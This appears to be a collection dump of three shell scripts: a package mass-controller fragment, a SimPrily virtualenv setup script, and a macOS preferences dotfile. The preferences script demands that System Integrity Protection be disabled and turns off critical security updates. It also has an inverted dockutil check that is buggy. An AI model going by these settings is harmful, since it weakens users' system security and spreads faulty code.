collectChanges=false
collectChangesNoConfirm=false
generatePkgs=false
addPkgsToRepo=false
# Argument loop: value-taking flags shift once inside their branch (leaving
# the value in $1 for readlink) and the trailing `shift` consumes it.
# NOTE(review): after such an inner shift, the remaining `if`s in the same
# iteration compare against the *value* — a value literally equal to
# another flag would mis-trigger it. A case/esac would avoid this.
while test $# -gt 0
do
if [ "$1" = '--help' ] || [ "$1" = '-h' ] ; then
echo "=== Lighp package mass controller ==="
echo " version $APP_VERSION "
echo " written by $APP_AUTHOR "
echo ""
echo "Usage : ./massctl.sh [--repository REPO_PATH] [--base-dir BASE_DIR] [--lighp-path LIGHP_PATH] [--collect-changes] [--collect-noconfirm] [--generate] [--add-to-repo]"
echo "Usage : ./massctl.sh [-r REPO_PATH] [-b BASE_DIR] [--l LIGHP_PATH] [-C] [-G] [-A]"
echo "BASE_DIR: by default, current directory"
echo "LIGHP_PATH: by default, none"
exit
fi
if [ "$1" = '--base-dir' ] || [ "$1" = '-b' ] ; then
shift
rootPath=$(readlink -f "$1")
fi
if [ "$1" = '--repository' ] || [ "$1" = '-r' ] ; then
shift
repoPath=$(readlink -f "$1")
fi
if [ "$1" = '--lighp-path' ] || [ "$1" = '-l' ] ; then
shift
lighpPath=$(readlink -f "$1")
fi
if [ "$1" = '--collect-changes' ] || [ "$1" = '-C' ] ; then
collectChanges=true
fi
if [ "$1" = '--collect-noconfirm' ] ; then
collectChangesNoConfirm=true
fi
if [ "$1" = '--generate' ] || [ "$1" = '-G' ] ; then
generatePkgs=true
fi
if [ "$1" = '--add-to-repo' ] || [ "$1" = '-A' ] ; then
addPkgsToRepo=true
fi
shift
done
# Default the package base directory to the current working directory.
if [ -z "$rootPath" ] ; then
	rootPath=$(pwd)
fi
# Enumerate the top-level entries of $rootPath by globbing instead of
# parsing `ls`, so names containing whitespace stay single array elements.
# (The -e guard handles an empty directory, where the glob stays literal.)
pkgFolders=()
for entry in "$rootPath"/* ; do
	[ -e "$entry" ] || continue
	pkgFolders+=( "${entry##*/}" )
done
# --collect-changes: run changescollector.sh for every package folder that
# has a src/ subdirectory, pointing it at the Lighp checkout.
if [ $collectChanges = true ] ; then
if [ -z "$lighpPath" ] ; then
read -p "Lighp's path : " lighpPath
fi
if [ ! -d "$lighpPath" ] ; then
echo "Lighp dir \"$lighpPath\" doesn't exists."
exit
fi
for pkgName in ${pkgFolders[@]}
do
# Skip entries that are not directories (relative to the cwd).
if [ ! -d "$pkgName" ] ; then
continue
fi
pkgDir="$rootPath/$pkgName"
if [ ! -d "$pkgDir/src" ] ; then
continue
fi
echo "Collecting changes for package in folder \"$pkgDir\"..."
args="--input \"$pkgDir\" --lighp-path \"$lighpPath\""
if [ $collectChangesNoConfirm = true ] ; then
args="$args --yes"
fi
# NOTE(review): eval on a string built from paths breaks (or injects) if a
# path contains quotes; building an array of args would be safer.
eval "./changescollector.sh $args"
done
fi
# --generate: build a package in-place for every folder with a src/ subdir.
if [ $generatePkgs = true ] ; then
for pkgName in ${pkgFolders[@]}
do
if [ ! -d "$pkgName" ] ; then
continue
fi
pkgDir="$rootPath/$pkgName"
if [ ! -d "$pkgDir/src" ] ; then
continue
fi
echo "Generating package in folder \"$pkgDir\"..."
./generatepkg.sh --name "$pkgName" --input "$pkgDir" --output "$pkgDir"
done
fi
# --add-to-repo: register every folder holding a metadata.json with repoctl.
if [ $addPkgsToRepo = true ] ; then
if [ -z "$repoPath" ] ; then
read -p "Repository's path : " repoPath
fi
if [ ! -d "$repoPath" ] ; then
echo "Repo \"$repoPath\" doesn't exists."
exit
fi
for pkgFolder in ${pkgFolders[@]}
do
if [ ! -d "$pkgFolder" ] ; then
continue
fi
pkgMetadataPath="$rootPath/$pkgFolder/metadata.json"
if [ ! -f "$pkgMetadataPath" ] ; then
continue
fi
echo "Adding package in folder \"$pkgFolder\"..."
./repoctl.sh --repository "$repoPath" --add-pkg "$rootPath/$pkgFolder"
done
fi
echo "Done."
| true
|
60cf6b4b0efcc76a66922a727109bd51595afd15
|
Shell
|
ElsevierSoftwareX/SOFTX_2018_97
|
/setup/setup_env_2.7.sh
|
UTF-8
| 967
| 3.578125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Must run this script from SimPrily
# Tested on Ubuntu 16.04
# Creates a python-2.7 virtualenv next to the repo and installs SimPrily's
# pinned requirements into it via pip-tools' pip-sync.
echo "This will set up a python virtual environment with python 2.7 and include all the required packages for SimPrily."
echo "This script requires sudo privileges and apt-get.
If you do not have sudo privileges or cannot install apt-get see the SimPrily documentation for other options.
http://simprily.readthedocs.io/en/latest/install.html#environment-set-up"
# Give the reader a moment to Ctrl-C before sudo work starts.
sleep 5
set -e # quits at first error
# The virtualenv is created in the parent directory, next to the repo.
cd ..
sudo apt-get update
# NOTE(review): apt-get upgrade without -y prompts interactively — confirm
# this script is meant to be attended.
sudo apt-get upgrade
sudo apt-get install python-virtualenv git python-dev
sudo easy_install -U distribute
virtualenv simprily_env
source simprily_env/bin/activate
cd SimPrily
pip install --upgrade pip
pip install pip-tools
# pip-sync installs exactly what the checked-in requirements files specify.
pip-sync
echo ""
echo "###################################"
echo ""
echo "Finished installing"
echo "SimPrily should be run like this:"
echo "simprily_env/bin/python simprily.py"
echo ""
simprily_env/bin/python simprily.py --help
| true
|
407af14f1caae014a34438ff4158932aa6eee575
|
Shell
|
blackwut/dotfiles
|
/preferences.sh
|
UTF-8
| 30,480
| 2.859375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
if csrutil status | grep -q enabled; then
echo "Please disable System Integrity Protection (SIP) by following sleepimage.sh script description."
exit
fi
if command -v dockutil; then
echo "Please install dockutil"
exit
fi
# Close any open System Preferences panes, to prevent them from overriding
# settings we’re about to change
osascript -e 'tell application "System Preferences" to quit'
# Ask for the administrator password upfront
sudo -v
# Keep-alive: update existing `sudo` time stamp until the script has finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
###############################################################################
# General UI/UX #
###############################################################################
# Set computer name (as done via System Preferences -> Sharing)
sudo scutil --set ComputerName "BlackwutMac"
sudo scutil --set HostName "Blackwut"
sudo scutil --set LocalHostName "Blackwut"
sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server NetBIOSName -string "Blackwut"
# Set sidebar icon size to small
defaults write NSGlobalDomain NSTableViewDefaultSizeMode -int 1
# Increase window resize speed for Cocoa applications
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
# Expand save panel by default
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode -bool true
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode2 -bool true
# Expand print panel by default
defaults write NSGlobalDomain PMPrintingExpandedStateForPrint -bool true
defaults write NSGlobalDomain PMPrintingExpandedStateForPrint2 -bool true
# Automatically quit printer app once the print jobs complete
defaults write com.apple.print.PrintingPrefs "Quit When Finished" -bool true
# Save to disk (not to iCloud) by default
defaults write NSGlobalDomain NSDocumentSaveNewDocumentsToCloud -bool false
# Remove duplicates in the “Open With” menu (also see `lscleanup` alias)
/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -kill -r -domain local -domain system -domain user #
# Enable subpixel font rendering on non-Apple LCDs
defaults write NSGlobalDomain AppleFontSmoothing -int 2
# Disable Resume system-wide
defaults write com.apple.systempreferences NSQuitAlwaysKeepsWindows -bool false
# Increase sound quality for Bluetooth headphones/headsets
defaults write com.apple.BluetoothAudioAgent "Apple Bitpool Min (editable)" -int 40
# Set Help Viewer windows to non-floating mode
defaults write com.apple.helpviewer DevMode -bool true
# Turn Bluetooth off.
sudo defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState -int 0
# Disable the system alert sound
defaults write NSGlobalDomain com.apple.sound.beep.volume -int 0
defaults write NSGlobalDomain com.apple.sound.uiaudio.enabled -int 0
# Enable volume change feedback
defaults write NSGlobalDomain com.apple.sound.beep.feedback -bool true
# Show battery percentage
defaults write com.apple.menuextra.battery ShowPercent -bool true
# Show menu extras
defaults write com.apple.systemuiserver menuExtras -array \
"/System/Library/CoreServices/Menu Extras/AirPort.menu" \
"/System/Library/CoreServices/Menu Extras/Clock.menu" \
"/System/Library/CoreServices/Menu Extras/Battery.menu"
# Setup the menu bar date format
defaults write com.apple.menuextra.clock DateFormat -string "EEE d MMM HH:mm:ss"
# Flash the : in the menu bar
defaults write com.apple.menuextra.clock FlashDateSeparators -bool false
# 24 hour time
defaults write NSGlobalDomain AppleICUForce24HourTime -bool true
# Shows ethernet connected computers in airdrop
defaults write com.apple.NetworkBrowser BrowseAllInterfaces -bool true
# Show all processes in Activity Monitor
defaults write com.apple.ActivityMonitor ShowCategory -int 0
# Disable all actions when inserting disks
defaults write com.apple.digihub com.apple.digihub.blank.bd.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.blank.cd.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.blank.dvd.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.cd.music.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.dvcamera.IIDC.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.dvcamera.IIDC.irisopened -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.dvd.video.appeared -dict-add action -int 1
# Enable the debug menu in Disk Utility
defaults write com.apple.DiskUtility DUDebugMenuEnabled -bool true
defaults write com.apple.DiskUtility advanced-image-options -bool true
# Enable HiDPI display modes (requires restart)"
sudo defaults write /Library/Preferences/com.apple.windowserver DisplayResolutionEnabled -bool true
###############################################################################
# PMSET - NVRAM - SYSTEMSETUP #
###############################################################################
# Disable Sudden Motion Sensor
sudo pmset -a sms 0
# Disable hibernation (speeds up entering sleep mode)
sudo pmset -a hibernatemode 0
# Set standby delay to 24 hours
sudo pmset -a standbydelay 86400
# Disable sleep
sudo pmset -a sleep 0
# Disable disk spindown timer
sudo pmset -a disksleep 0
# Set display sleep to 1 minute
sudo pmset -a displaysleep 1
# Disable wake on ethernet magic packet
sudo pmset -a womp 0
# Disable autorestart on power loss
sudo pmset -a autorestart 0
# Disable slightly turn down display brightness on battery
sudo pmset -a lessbright 0
# Disable the sound effects on boot
sudo nvram SystemAudioVolume=" "
# Never go into computer sleep mode
sudo systemsetup -setcomputersleep Off > /dev/null
###############################################################################
# SSD Tweaks                                                                  #
###############################################################################
# Disable Creation of .DS_Store Files on Network Volumes
defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true
# Disable Creation of .DS_Store Files on USB Volumes
defaults write com.apple.desktopservices DSDontWriteUSBStores -bool true
# Save screenshots to the RamDisk
# NOTE(review): assumes a volume named "RamDisk" is mounted by some other part
# of the setup -- confirm, otherwise screenshots silently fail to save.
defaults write com.apple.screencapture location -string "/Volumes/RamDisk"
# Save screenshots in PNG format (other options: BMP, GIF, JPG, PDF, TIFF)
defaults write com.apple.screencapture type -string "png"
# Disable shadow in screenshots
defaults write com.apple.screencapture disable-shadow -bool true
###############################################################################
# Time Machine                                                                #
###############################################################################
# Disable Time Machine backups entirely
sudo tmutil disable
# Prevent Time Machine from prompting to use a newly attached disk as backup
sudo defaults write /Library/Preferences/com.apple.TimeMachine DoNotOfferNewDisksForBackup -bool true
###############################################################################
# Trackpad                                                                    #
###############################################################################
# Enable tap to click for this user and for the login screen
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad Clicking -bool true
defaults -currentHost write NSGlobalDomain com.apple.mouse.tapBehavior -int 1
# Disable three finger tap
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadThreeFingerTapGesture -int 0
defaults -currentHost write NSGlobalDomain com.apple.trackpad.threeFingerTapGesture -int 0
# Trackpad: disable 'smart zoom' two finger double tap (value 0 = off)
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadTwoFingerDoubleTapGesture -int 0
defaults -currentHost write NSGlobalDomain com.apple.trackpad.twoFingerDoubleTapGesture -int 0
# Trackpad: disable swipe from right to show notification center
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadTwoFingerFromRightEdgeSwipeGesture -int 0
defaults -currentHost write NSGlobalDomain com.apple.trackpad.twoFingerFromRightEdgeSwipeGesture -int 0
# Mouse: TwoButton mouse
defaults write com.apple.driver.AppleBluetoothMultitouch.mouse.plist MouseButtonMode -string "TwoButton"
# Map bottom right corner to right-click [To be checked]
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadCornerSecondaryClick -int 2
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadRightClick -bool true
defaults -currentHost write NSGlobalDomain com.apple.trackpad.trackpadCornerClickBehavior -int 1
defaults -currentHost write NSGlobalDomain com.apple.trackpad.enableSecondaryClick -bool true
# Disable "natural" (Lion-style) scrolling
defaults write -g com.apple.swipescrolldirection -bool false
# Disable El Capitan shake to magnify cursor
defaults write NSGlobalDomain CGDisableCursorLocationMagnification -bool true
# Set mouse tracking speed to 5
defaults write -g com.apple.mouse.scaling 5
###############################################################################
# Keyboard                                                                    #
###############################################################################
# Disable automatic capitalization as it's annoying when typing code
defaults write NSGlobalDomain NSAutomaticCapitalizationEnabled -bool false
# Disable smart dashes as they're annoying when typing code
defaults write NSGlobalDomain NSAutomaticDashSubstitutionEnabled -bool false
# Disable automatic period substitution as it's annoying when typing code
defaults write NSGlobalDomain NSAutomaticPeriodSubstitutionEnabled -bool false
# Disable smart quotes as they're annoying when typing code
defaults write NSGlobalDomain NSAutomaticQuoteSubstitutionEnabled -bool false
# Disable auto-correct
defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false
# Enable full keyboard access for all controls
# (e.g. enable Tab in modal dialogs)
defaults write NSGlobalDomain AppleKeyboardUIMode -int 3
# Use scroll gesture with the Command modifier key to zoom
# (1048576 is the modifier mask for the Command key)
defaults -currentHost write com.apple.universalaccess closeViewScrollWheelModifiersInt 1048576
defaults -currentHost write com.apple.universalaccess closeViewScrollWheelPreviousToggle 1
defaults -currentHost write com.apple.universalaccess closeViewScrollWheelToggle 1
# Disable press-and-hold for keys in favor of key repeat
defaults write NSGlobalDomain ApplePressAndHoldEnabled -bool false
# Set a blazingly fast keyboard repeat rate (lower = faster)
defaults write NSGlobalDomain KeyRepeat -int 2
defaults write NSGlobalDomain InitialKeyRepeat -int 15
###############################################################################
# Finder                                                                      #
###############################################################################
# Unhide User Library Folder
chflags nohidden ~/Library
# Unhide Volumes Folder
sudo chflags nohidden /Volumes
# Desktop Show Internal Media
defaults write com.apple.finder ShowHardDrivesOnDesktop -bool true
# Desktop Show External Media
defaults write com.apple.finder ShowExternalHardDrivesOnDesktop -bool true
# Desktop: do NOT show mounted servers
defaults write com.apple.finder ShowMountedServersOnDesktop -bool false
# Desktop Show Removable Media
defaults write com.apple.finder ShowRemovableMediaOnDesktop -bool true
# Allow text selection in QuickLook
defaults write com.apple.finder QLEnableTextSelection -bool true
# Don't use tabs in Finder
defaults write com.apple.finder AppleWindowTabbingMode -string "manual"
# Hide the status bar (set to true to show it)
defaults write com.apple.finder ShowStatusBar -bool false
# Show path bar
defaults write com.apple.finder ShowPathbar -bool true
# Display full POSIX path as Finder window title
defaults write com.apple.finder _FXShowPosixPathInTitle -bool true
# Enable spring loading for directories
defaults write -g com.apple.springing.enabled -bool true
# Remove the spring loading delay for directories
defaults write -g com.apple.springing.delay -float 0
# Expand the following File Info panes:
# "General", "Open with", and "Sharing & Permissions"
defaults write com.apple.finder FXInfoPanesExpanded -dict General -bool true OpenWith -bool true Privileges -bool true
# Set default Finder path to the home folder
# For desktop, use `PfDe`
# For other paths, use `PfLo` and `file:///full/path/here/`
defaults write com.apple.finder NewWindowTarget -string "PfHm"
defaults write com.apple.finder NewWindowTargetPath -string "file://${HOME}/"
# Show all filename extensions
defaults write NSGlobalDomain AppleShowAllExtensions -bool true
# When performing a search, search the current folder by default
defaults write com.apple.finder FXDefaultSearchScope -string "SCcf"
# Keep folders on top when sorting by name
defaults write com.apple.finder _FXSortFoldersFirst -bool true
# Disable the warning when changing a file extension
defaults write com.apple.finder FXEnableExtensionChangeWarning -bool false
# Enable snap-to-grid for icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:arrangeBy name" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:arrangeBy name" ~/Library/Preferences/com.apple.finder.plist
# Set grid spacing for icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:gridSpacing 28" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:gridSpacing 28" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:gridSpacing 28" ~/Library/Preferences/com.apple.finder.plist
# Set the size of icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:iconSize 48" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:iconSize 48" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:iconSize 48" ~/Library/Preferences/com.apple.finder.plist
# Remove all tags from contextual menu (replace list with a single empty entry)
/usr/libexec/PlistBuddy -c "Delete :FavoriteTagNames" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :FavoriteTagNames array" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :FavoriteTagNames:0 string" ~/Library/Preferences/com.apple.finder.plist
# Configure Finder Toolbar: back, switch-view, search, with flexible spacers
/usr/libexec/PlistBuddy -c "Delete :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers array" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:0 string com.apple.finder.BACK" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:1 string NSToolbarFlexibleSpaceItem" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:2 string com.apple.finder.SWCH" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:3 string NSToolbarFlexibleSpaceItem" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:4 string com.apple.finder.SRCH" ~/Library/Preferences/com.apple.finder.plist
# Use list view in all Finder windows by default
#   Flwv: Cover Flow View
#   Nlsv: List View
#   clmv: Column View
#   icnv: Icon View
defaults write com.apple.finder FXPreferredViewStyle -string "Nlsv"
# Setting up Finder Sidebar
# NOTE(review): relies on the third-party FinderSidebarEditor python module
# being importable -- confirm it is installed earlier in the setup.
# The heredoc is unquoted on purpose so $HOME expands before python runs.
python - <<EOF
from FinderSidebarEditor import FinderSidebar
sidebar = FinderSidebar()
sidebar.removeAll()
sidebar.add("$HOME/Projects")
sidebar.add("$HOME/Dropbox")
sidebar.add("$HOME/Documents")
sidebar.add("$HOME/Desktop")
sidebar.add("/Applications")
sidebar.add("$HOME")
sidebar.add("/Volumes/Mojave")
EOF
# Removing .DS_Store files so per-directory view settings are regenerated
echo "Removing .DS_Store files everywhere to update PreferredViewStyle in all directories... (this may take a while)"
sudo find / -name .DS_Store -delete 2> /dev/null
# Speed up Mission Control animations
defaults write com.apple.dock expose-animation-duration -float 0.1
# Don't group windows by application in Mission Control
defaults write com.apple.dock expose-group-by-app -bool false
# Show Dashboard as a Space
defaults write com.apple.dashboard db-enabled-state -int 3
# Don't automatically rearrange Spaces based on most recent use
defaults write com.apple.dock mru-spaces -bool false
# Don't show recent applications in Dock
defaults write com.apple.dock show-recents -bool false
# Hot corners
# Possible values:
#  0: no-op
#  2: Mission Control
#  3: Show application windows
#  4: Desktop
#  5: Start screen saver
#  6: Disable screen saver
#  7: Dashboard
# 10: Put display to sleep
# 11: Launchpad
# 12: Notification Center
# Top left screen corner -> Mission Control
defaults write com.apple.dock wvous-tl-corner -int 2
defaults write com.apple.dock wvous-tl-modifier -int 0
# Top right screen corner -> Dashboard
defaults write com.apple.dock wvous-tr-corner -int 7
defaults write com.apple.dock wvous-tr-modifier -int 0
# Bottom Right screen corner -> Desktop
defaults write com.apple.dock wvous-br-corner -int 4
defaults write com.apple.dock wvous-br-modifier -int 0
# Install the iStatPro widget and restore its saved preferences
# NOTE(review): assumes iStatPro.wdgt.tar.gz and ./preferences/* ship next to
# this script -- confirm the working directory before running.
tar -xvzf iStatPro.wdgt.tar.gz -C ~/Library/Widgets/.
plutil -convert binary1 -o - "./preferences/widget-com.iSlayer.iStatpro4.widget.plist" > ~/"Library/Preferences/widget-com.iSlayer.iStatpro4.widget.plist"
plutil -convert binary1 -o - "./preferences/com.apple.dashboard.plist" > ~/"Library/Preferences/com.apple.dashboard.plist"
###############################################################################
# Dock                                                                        #
###############################################################################
# Set the icon size of Dock items to 32 pixels
defaults write com.apple.dock tilesize -int 32
# Change minimize/maximize window effect
defaults write com.apple.dock mineffect -string "scale"
# Minimize windows into their application's icon
defaults write com.apple.dock minimize-to-application -bool true
# Enable spring loading for all Dock items
defaults write com.apple.dock enable-spring-load-actions-on-all-items -bool true
# Keep the Dock always visible (auto-hide disabled)
defaults write com.apple.dock autohide -bool false
# Disable Dock magnification (zoom size 0)
defaults write com.apple.dock magnification -int 0
# Lock dock size
defaults write com.apple.Dock size-immutable -bool yes
# Disable bouncing
defaults write com.apple.dock no-bouncing -bool true
# Rebuild the Dock contents from scratch (requires the `dockutil` tool)
dockutil --remove all
dockutil --add "/Applications/Safari.app"
dockutil --add "/Applications/Telegram Desktop.app"
dockutil --add "/Applications/WhatsApp.app"
dockutil --add "/Applications/Discord.app"
dockutil --add "/Applications/TextEdit.app"
dockutil --add "/Applications/Notes.app"
dockutil --add "/Applications/Calendar.app"
dockutil --add "/Applications/Maps.app"
dockutil --add "/Applications/iTunes.app"
dockutil --add "/Applications/App Store.app"
dockutil --add "/Applications/System Preferences.app"
dockutil --add "/Applications/Utilities/Terminal.app"
dockutil --add "/Applications/HSTracker.app"
dockutil --add "/Applications/Battle.net.app"
dockutil --add "/Applications/Typora.app"
dockutil --add "/Applications/Sublime Text.app"
# Folder stacks on the right-hand side of the Dock
dockutil --add "/Applications" --view grid --display folder --sort name
dockutil --add "$HOME/Projects" --view grid --display folder --sort name
dockutil --add "$HOME/Downloads" --view grid --display folder --sort dateadded
###############################################################################
# Spotlight                                                                   #
###############################################################################
# Exclude mounted volumes from Spotlight indexing
sudo defaults write /.Spotlight-V100/VolumeConfiguration Exclusions -array "/Volumes"
# Change indexing order and disable some search results
# Yosemite-specific search results (remove them if you are using macOS 10.9 or older):
#   MENU_DEFINITION
#   MENU_CONVERSION
#   MENU_EXPRESSION
#   MENU_SPOTLIGHT_SUGGESTIONS (send search queries to Apple)
#   MENU_WEBSEARCH             (send search queries to Apple)
#   MENU_OTHER
defaults write com.apple.spotlight orderedItems -array \
    '{"enabled" = 1; "name" = "APPLICATIONS";}' \
    '{"enabled" = 1; "name" = "SYSTEM_PREFS";}' \
    '{"enabled" = 1; "name" = "PDF";}' \
    '{"enabled" = 1; "name" = "MENU_EXPRESSION";}' \
    '{"enabled" = 1; "name" = "MENU_DEFINITION";}' \
    '{"enabled" = 0; "name" = "SOURCE";}' \
    '{"enabled" = 0; "name" = "MENU_OTHER";}' \
    '{"enabled" = 0; "name" = "MENU_SPOTLIGHT_SUGGESTIONS";}' \
    '{"enabled" = 0; "name" = "MENU_CONVERSION";}' \
    '{"enabled" = 0; "name" = "DOCUMENTS";}' \
    '{"enabled" = 0; "name" = "DIRECTORIES";}' \
    '{"enabled" = 0; "name" = "PRESENTATIONS";}' \
    '{"enabled" = 0; "name" = "SPREADSHEETS";}' \
    '{"enabled" = 0; "name" = "MESSAGES";}' \
    '{"enabled" = 0; "name" = "CONTACT";}' \
    '{"enabled" = 0; "name" = "EVENT_TODO";}' \
    '{"enabled" = 0; "name" = "IMAGES";}' \
    '{"enabled" = 0; "name" = "BOOKMARKS";}' \
    '{"enabled" = 0; "name" = "MUSIC";}' \
    '{"enabled" = 0; "name" = "MOVIES";}' \
    '{"enabled" = 0; "name" = "FONTS";}'
# Load new settings before rebuilding the index
killall mds > /dev/null 2>&1
# Make sure indexing is enabled for the main volume
sudo mdutil -i on / > /dev/null
# Rebuild the index from scratch
sudo mdutil -E / > /dev/null
###############################################################################
# Textedit                                                                    #
###############################################################################
# Use plain text mode for new TextEdit documents
defaults write com.apple.TextEdit RichText -int 0
# Open and save files as UTF-8 in TextEdit (4 = NSUTF8StringEncoding)
defaults write com.apple.TextEdit PlainTextEncoding -int 4
defaults write com.apple.TextEdit PlainTextEncodingForWrite -int 4
###############################################################################
# Safari [Doesn't Work anymore]                                               #
###############################################################################
# NOTE(review): this whole section is intentionally commented out; the header
# says these keys no longer take effect -- confirm before re-enabling any.
# Tell Safari to open new window links in tabs
# defaults write com.apple.Safari TargetedClicksCreateTabs -bool true
# # Reduce delay when rendering pages
# defaults write com.apple.Safari WebKitInitialTimedLayoutDelay 0.1
# # Show the full URL in the address bar (note: this still hides the scheme)
# defaults write com.apple.Safari ShowFullURLInSmartSearchField -bool true
# # Copy email addresses as `foo@example.com` instead of `Foo Bar <foo@example.com>` in Mail.app
# defaults write com.apple.mail AddressesIncludeNameOnPasteboard -bool false
# # Safari Developer and Debug menus
# defaults write com.apple.Safari IncludeInternalDebugMenu -bool true && \
# defaults write com.apple.Safari IncludeDevelopMenu -bool true && \
# defaults write com.apple.Safari WebKitDeveloperExtrasEnabledPreferenceKey -bool true && \
# defaults write com.apple.Safari com.apple.Safari.ContentPageGroupIdentifier.WebKit2DeveloperExtrasEnabled -bool true && \
# defaults write -g WebKitDeveloperExtras -bool true
# # Privacy: don't send search queries to Apple
# defaults write com.apple.Safari UniversalSearchEnabled -bool false
# defaults write com.apple.Safari SuppressSearchSuggestions -bool true
# # Set Safari's home page to `about:blank` for faster loading
# defaults write com.apple.Safari HomePage -string "about:blank"
# # Prevent Safari from opening 'safe' files automatically after downloading
# defaults write com.apple.Safari AutoOpenSafeDownloads -bool false
# # Show Safari's favorites bar by default
# defaults write com.apple.Safari ShowFavoritesBar -bool true
# # Remove useless icons from Safari's bookmarks bar
# defaults write com.apple.Safari ProxiesInBookmarksBar "()"
# # Hide Safari's sidebar in Top Sites
# defaults write com.apple.Safari ShowSidebarInTopSites -bool false
# # Warn about fraudulent websites
# defaults write com.apple.Safari WarnAboutFraudulentWebsites -bool true
# # Disable Java
# defaults write com.apple.Safari WebKitJavaEnabled -bool false
# defaults write com.apple.Safari com.apple.Safari.ContentPageGroupIdentifier.WebKit2JavaEnabled -bool false
# # Block pop-up windows
# defaults write com.apple.Safari WebKitJavaScriptCanOpenWindowsAutomatically -bool false
# defaults write com.apple.Safari com.apple.Safari.ContentPageGroupIdentifier.WebKit2JavaScriptCanOpenWindowsAutomatically -bool false
# # Enable "Do Not Track"
# defaults write com.apple.Safari SendDoNotTrackHTTPHeader -bool true
# # Update extensions automatically
# defaults write com.apple.Safari InstallExtensionUpdatesAutomatically -bool true
###############################################################################
# Photos                                                                      #
###############################################################################
# Prevent Photos from opening automatically when devices are plugged in
defaults -currentHost write com.apple.ImageCapture disableHotPlug -bool true
###############################################################################
# iTunes                                                                      #
###############################################################################
# Stop running an automatic backup when you plug in an iOS device
defaults write com.apple.iTunes AutomaticDeviceBackupsDisabled -bool true
###############################################################################
# Transmission.app                                                            #
###############################################################################
# Use `/Volumes/RamDisk` to store incomplete downloads
defaults write org.m0k.transmission UseIncompleteDownloadFolder -bool true
defaults write org.m0k.transmission IncompleteDownloadFolder -string "/Volumes/RamDisk"
# Don't prompt for confirmation before downloading
defaults write org.m0k.transmission DownloadAsk -bool false
defaults write org.m0k.transmission MagnetOpenAsk -bool false
# Keep the original torrent files (auto-trash disabled)
defaults write org.m0k.transmission DeleteOriginalTorrent -bool false
# Hide the donate message
defaults write org.m0k.transmission WarningDonate -bool false
# Hide the legal disclaimer
defaults write org.m0k.transmission WarningLegal -bool false
# IP block list.
# Source: https://giuliomac.wordpress.com/2014/02/19/best-blocklist-for-transmission/
defaults write org.m0k.transmission BlocklistNew -bool true
defaults write org.m0k.transmission BlocklistURL -string "http://john.bitsurge.net/public/biglist.p2p.gz"
defaults write org.m0k.transmission BlocklistAutoUpdate -bool true
# Randomize port on launch
defaults write org.m0k.transmission RandomPort -bool true
###############################################################################
# Updates                                                                     #
###############################################################################
# Disable every flavor of automatic update checking/downloading/installing.
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticCheckEnabled -bool false
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticDownload -bool false
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticallyInstallMacOSUpdates -bool false
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate CriticalUpdateInstall -bool false
